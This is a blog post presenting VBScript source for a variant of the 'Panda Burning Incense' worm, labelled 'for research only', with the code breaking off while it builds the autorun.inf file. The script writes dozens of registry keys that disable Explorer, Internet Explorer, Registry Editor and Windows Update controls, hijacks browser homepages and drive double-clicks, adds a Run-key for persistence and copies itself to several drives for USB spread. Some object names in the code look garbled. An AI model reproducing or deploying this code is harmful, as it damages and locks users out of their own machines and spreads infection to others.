熊猫烧香病毒vbs版本 仅供研究

3 篇文章 0 订阅

 dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=w.createobject("w.shell")
set fso=w.createobject("ing.filesystemobject")
set myfile=fso.GetFile(w.fullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/History",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Start Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Search Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Default_Page_URL","http://baidu.com"
wsh.Regwrite "HKCU/Software/Microsoft/Internet Explorer/Main/Default_Search_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Start Page","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Default_Page_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Default_Search_URL","http://baidu.com"
wsh.Regwrite "HKEY_USERS/.DEFAULT/Software/Microsoft/Internet Explorer/Main/Search Page","http://baidu.com"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel/ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions/NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Policies/Microsoft/Internet Explorer/Infodelivery/Restrictions/NoAddingSubions",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp/NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/Win32system","c:/NYboy.vbs"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Run/ScanRegistry",""
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/System/DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/WinOldApp/Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLM/SOFTWARE/Classes/Drive/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKCR/Drive/shell/","auto"
wsh.Regwrite "HKCR/Drive/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKLM/SOFTWARE/Classes/Directory/shell/","auto"
wsh.Regwrite "HKCR/Directory/shell/auto/command/","C:/NYboy.bat '%1'"
wsh.Regwrite "HKLM/SOFTWARE/Classes/Directory/shell/auto/command/","C:/NYboy.bat '%1'"
'修改默认文件图标,这里可以换成可爱的熊猫哦,(修改dll也可以实现,只是有点难)
wsh.Regwrite "HKCR/exefile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/txtfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/dllfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/batfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKCR/inifile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/exefile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/txtfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/dllfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/batfile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/SOFTWARE/Classes/inifile/DefaultIcon/","c:/1.ico"
wsh.Regwrite "HKLM/Software/CLASSES/.reg/","txtfile"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeCaption","你好啊,狂野少年和你开个小小的玩笑"
wsh.Regwrite "HKLM/Software/Microsoft/Windows/CurrentVersion/Winlogon/LegalNoticeText","你已经中毒了,赶快杀毒"
'复制自身到C,D,E,F,U盘
myfile.copy "c:/"
myfile.copy "D:/"
myfile.copy "E:/"
myfile.copy "F:/"
myfile.copy "I:/"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写哦^_^
If fso.FileExists("C:/autorun.inf") Then
Set objFolder = fso.GetFile("C:/autorun.inf")
Else

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值